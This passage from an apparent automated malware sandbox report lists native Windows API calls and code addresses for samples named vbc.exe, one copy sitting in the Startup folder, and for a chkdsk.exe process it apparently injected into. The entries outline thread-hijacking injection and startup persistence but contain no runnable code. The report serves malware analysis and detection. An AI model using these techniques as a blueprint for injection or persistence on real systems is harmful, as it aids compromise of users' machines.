Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BF9F0 NtClose,LdrInitializeThunk, 8_2_008BF9F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BF900 NtReadFile,LdrInitializeThunk, 8_2_008BF900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_008BFAD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_008BFAE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_008BFBB8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_008BFB68
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFC90 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_008BFC90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_008BFC60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFD8C NtDelayExecution,LdrInitializeThunk, 8_2_008BFD8C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_008BFDC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFEA0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_008BFEA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_008BFED0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFFB4 NtCreateSection,LdrInitializeThunk, 8_2_008BFFB4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C0060 NtQuerySection, 8_2_008C0060
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C01D4 NtSetValueKey, 8_2_008C01D4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C010C NtOpenDirectoryObject, 8_2_008C010C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C07AC NtCreateMutant, 8_2_008C07AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C0C40 NtGetContextThread, 8_2_008C0C40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C10D0 NtOpenProcessToken, 8_2_008C10D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C1148 NtOpenThread, 8_2_008C1148
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BF8CC NtWaitForSingleObject, 8_2_008BF8CC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BF938 NtWriteFile, 8_2_008BF938
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C1930 NtSetContextThread, 8_2_008C1930
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFAB8 NtQueryValueKey, 8_2_008BFAB8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFA20 NtQueryInformationFile, 8_2_008BFA20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFA50 NtEnumerateValueKey, 8_2_008BFA50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFBE8 NtQueryVirtualMemory, 8_2_008BFBE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFB50 NtCreateKey, 8_2_008BFB50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFC30 NtOpenProcess, 8_2_008BFC30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFC48 NtSetInformationFile, 8_2_008BFC48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C1D80 NtSuspendThread, 8_2_008C1D80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFD5C NtEnumerateKey, 8_2_008BFD5C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFE24 NtWriteVirtualMemory, 8_2_008BFE24
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFFFC NtCreateProcessEx, 8_2_008BFFFC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFF34 NtQueueApcThread, 8_2_008BFF34
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00289882 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 8_2_00289882
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02540078 NtResumeThread,LdrInitializeThunk, 9_2_02540078
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025400C4 NtCreateFile,LdrInitializeThunk, 9_2_025400C4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025407AC NtCreateMutant,LdrInitializeThunk, 9_2_025407AC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FA50 NtEnumerateValueKey,LdrInitializeThunk, 9_2_0253FA50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_0253FAD0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_0253FAE8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_0253FAB8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FB50 NtCreateKey,LdrInitializeThunk, 9_2_0253FB50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_0253FB68
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_0253FBB8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253F900 NtReadFile,LdrInitializeThunk, 9_2_0253F900
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253F938 NtWriteFile,LdrInitializeThunk, 9_2_0253F938
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253F9F0 NtClose,LdrInitializeThunk, 9_2_0253F9F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_0253FED0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FEA0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_0253FEA0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FFB4 NtCreateSection,LdrInitializeThunk, 9_2_0253FFB4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FC48 NtSetInformationFile,LdrInitializeThunk, 9_2_0253FC48
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_0253FC60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FC90 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_0253FC90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_0253FDC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FD8C NtDelayExecution,LdrInitializeThunk, 9_2_0253FD8C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02540048 NtProtectVirtualMemory, 9_2_02540048
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02540060 NtQuerySection, 9_2_02540060
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025410D0 NtOpenProcessToken, 9_2_025410D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02541148 NtOpenThread, 9_2_02541148
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254010C NtOpenDirectoryObject, 9_2_0254010C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025401D4 NtSetValueKey, 9_2_025401D4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FA20 NtQueryInformationFile, 9_2_0253FA20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FBE8 NtQueryVirtualMemory, 9_2_0253FBE8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253F8CC NtWaitForSingleObject, 9_2_0253F8CC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02541930 NtSetContextThread, 9_2_02541930
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FE24 NtWriteVirtualMemory, 9_2_0253FE24
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FF34 NtQueueApcThread, 9_2_0253FF34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FFFC NtCreateProcessEx, 9_2_0253FFFC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02540C40 NtGetContextThread, 9_2_02540C40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FC30 NtOpenProcess, 9_2_0253FC30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FD5C NtEnumerateKey, 9_2_0253FD5C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02541D80 NtSuspendThread, 9_2_02541D80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009A050 NtClose, 9_2_0009A050
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009A100 NtAllocateVirtualMemory, 9_2_0009A100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00099F20 NtCreateFile, 9_2_00099F20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00099FD0 NtReadFile, 9_2_00099FD0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009A04E NtClose, 9_2_0009A04E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009A0FA NtAllocateVirtualMemory, 9_2_0009A0FA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00099F72 NtCreateFile, 9_2_00099F72
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00099FCB NtReadFile, 9_2_00099FCB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA93EE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 9_2_00EA93EE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA9882 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 9_2_00EA9882
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA93F2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_00EA93F2
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00192858 4_2_00192858
Source: C:\Users\Public\vbc.exe Code function: 4_2_001998F0 4_2_001998F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019D138 4_2_0019D138
Source: C:\Users\Public\vbc.exe Code function: 4_2_00191540 4_2_00191540
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019A6D8 4_2_0019A6D8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00192868 4_2_00192868
Source: C:\Users\Public\vbc.exe Code function: 4_2_00196960 4_2_00196960
Source: C:\Users\Public\vbc.exe Code function: 4_2_00195300 4_2_00195300
Source: C:\Users\Public\vbc.exe Code function: 4_2_00198BC8 4_2_00198BC8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00192D60 4_2_00192D60
Source: C:\Users\Public\vbc.exe Code function: 4_2_00196E10 4_2_00196E10
Source: C:\Users\Public\vbc.exe Code function: 4_2_00196E00 4_2_00196E00
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019C678 4_2_0019C678
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019DF90 4_2_0019DF90
Source: C:\Users\Public\vbc.exe Code function: 4_2_002F6468 4_2_002F6468
Source: C:\Users\Public\vbc.exe Code function: 4_2_002F1888 4_2_002F1888
Source: C:\Users\Public\vbc.exe Code function: 4_2_002F3CE8 4_2_002F3CE8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002F2158 4_2_002F2158
Source: C:\Users\Public\vbc.exe Code function: 4_2_002F1540 4_2_002F1540
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D72050 4_2_00D72050
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D997 5_2_0041D997
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D20B 5_2_0041D20B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D87 5_2_00402D87
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409E30 5_2_00409E30
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D6BE 5_2_0041D6BE
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084E0C6 5_2_0084E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084E2E9 5_2_0084E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F63BF 5_2_008F63BF
Source: C:\Users\Public\vbc.exe Code function: 5_2_008763DB 5_2_008763DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_00852305 5_2_00852305
Source: C:\Users\Public\vbc.exe Code function: 5_2_0089A37B 5_2_0089A37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D443E 5_2_008D443E
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D05E3 5_2_008D05E3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0086C5F0 5_2_0086C5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00896540 5_2_00896540
Source: C:\Users\Public\vbc.exe Code function: 5_2_00854680 5_2_00854680
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085E6C1 5_2_0085E6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F2622 5_2_008F2622
Source: C:\Users\Public\vbc.exe Code function: 5_2_0089A634 5_2_0089A634
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085C7BC 5_2_0085C7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085C85C 5_2_0085C85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087286D 5_2_0087286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F098E 5_2_008F098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_008529B2 5_2_008529B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_008669FE 5_2_008669FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E49F5 5_2_008E49F5
Source: C:\Users\Public\vbc.exe Code function: 5_2_0089C920 5_2_0089C920
Source: C:\Users\Public\vbc.exe Code function: 5_2_008FCBA4 5_2_008FCBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D6BCB 5_2_008D6BCB
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F2C9C 5_2_008F2C9C
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DAC5E 5_2_008DAC5E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00880D3B 5_2_00880D3B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085CD5B 5_2_0085CD5B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00882E2F 5_2_00882E2F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0086EE4C 5_2_0086EE4C
Source: C:\Users\Public\vbc.exe Code function: 5_2_008ECFB1 5_2_008ECFB1
Source: C:\Users\Public\vbc.exe Code function: 5_2_008C2FDC 5_2_008C2FDC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00860F3F 5_2_00860F3F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087D005 5_2_0087D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_00853040 5_2_00853040
Source: C:\Users\Public\vbc.exe Code function: 5_2_0086905A 5_2_0086905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_008CD06D 5_2_008CD06D
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DD13F 5_2_008DD13F
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F1238 5_2_008F1238
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084F3CF 5_2_0084F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00857353 5_2_00857353
Source: C:\Users\Public\vbc.exe Code function: 5_2_00885485 5_2_00885485
Source: C:\Users\Public\vbc.exe Code function: 5_2_00861489 5_2_00861489
Source: C:\Users\Public\vbc.exe Code function: 5_2_0088D47D 5_2_0088D47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F35DA 5_2_008F35DA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085351F 5_2_0085351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D579A 5_2_008D579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_008857C3 5_2_008857C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E771D 5_2_008E771D
Source: C:\Users\Public\vbc.exe Code function: 5_2_008CF8C4 5_2_008CF8C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_008EF8EE 5_2_008EF8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D394B 5_2_008D394B
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D5955 5_2_008D5955
Source: C:\Users\Public\vbc.exe Code function: 5_2_00903A83 5_2_00903A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084FBD7 5_2_0084FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DDBDA 5_2_008DDBDA
Source: C:\Users\Public\vbc.exe Code function: 5_2_00877B00 5_2_00877B00
Source: C:\Users\Public\vbc.exe Code function: 5_2_008EFDDD 5_2_008EFDDD
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DBF14 5_2_008DBF14
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087DF7C 5_2_0087DF7C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00D72050 5_2_00D72050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00392858 7_2_00392858
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_003998F0 7_2_003998F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039D514 7_2_0039D514
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00392D60 7_2_00392D60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00391540 7_2_00391540
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039A6D8 7_2_0039A6D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00392868 7_2_00392868
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039D138 7_2_0039D138
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00396960 7_2_00396960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00395300 7_2_00395300
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00398BC8 7_2_00398BC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00396E10 7_2_00396E10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00396E00 7_2_00396E00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039C678 7_2_0039C678
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039DF90 7_2_0039DF90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_005A28F8 7_2_005A28F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_00F22050 7_2_00F22050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00401030 8_2_00401030
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D997 8_2_0041D997
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D20B 8_2_0041D20B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00402D87 8_2_00402D87
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00402D90 8_2_00402D90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00409E30 8_2_00409E30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041D6BE 8_2_0041D6BE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00402FB0 8_2_00402FB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008CE0C6 8_2_008CE0C6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008CE2E9 8_2_008CE2E9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_009763BF 8_2_009763BF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008F63DB 8_2_008F63DB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D2305 8_2_008D2305
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0091A37B 8_2_0091A37B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095443E 8_2_0095443E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_009505E3 8_2_009505E3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008EC5F0 8_2_008EC5F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00916540 8_2_00916540
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D4680 8_2_008D4680
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008DE6C1 8_2_008DE6C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0091A634 8_2_0091A634
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00972622 8_2_00972622
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008DC7BC 8_2_008DC7BC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008DC85C 8_2_008DC85C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008F286D 8_2_008F286D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0097098E 8_2_0097098E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D29B2 8_2_008D29B2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_009649F5 8_2_009649F5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008E69FE 8_2_008E69FE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0091C920 8_2_0091C920
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0097CBA4 8_2_0097CBA4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00956BCB 8_2_00956BCB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00972C9C 8_2_00972C9C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0095AC5E 8_2_0095AC5E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00900D3B 8_2_00900D3B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008DCD5B 8_2_008DCD5B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00902E2F 8_2_00902E2F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008EEE4C 8_2_008EEE4C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0096CFB1 8_2_0096CFB1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00942FDC 8_2_00942FDC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008E0F3F 8_2_008E0F3F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008FD005 8_2_008FD005
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008D3040 8_2_008D3040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008E905A 8_2_008E905A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0094D06D 8_2_0094D06D
